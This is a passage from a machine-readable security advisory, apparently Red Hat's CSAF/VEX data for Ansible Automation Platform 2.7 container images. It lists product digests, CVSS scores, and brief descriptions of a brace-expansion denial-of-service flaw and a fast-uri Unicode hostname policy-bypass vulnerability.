"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "brace-expansion: Brace-expansion: Denial of Service due to exponential-time complexity"
},
{
"cve": "CVE-2026-13676",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-06-29T14:01:55.592330+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2494197"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-uri. This vulnerability occurs because fast-uri fails to properly convert Unicode (Internationalized Domain Name - IDN) hostnames for HTTP-family URLs. This can lead to a situation where security policies, such as denylists or redirect validations, are bypassed when applications use fast-uri to enforce these policies before passing the URL to another parser. A remote attacker could exploit this to circumvent security controls and potentially access unauthorized resources or perform malicious redirects.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-uri: fast-uri: Security policy bypass due to improper Unicode hostname canonicalization",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in `fast-uri` allows a remote attacker to bypass host-based security policies. Applications that rely on `fast-uri` for URL parsing and policy enforcement, such as denylists or redirect validations, can be circumvented due to inconsistent handling of Unicode hostnames. This discrepancy between `fast-uri` and other URL parsers could lead to unauthorized resource access or malicious redirects in affected Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
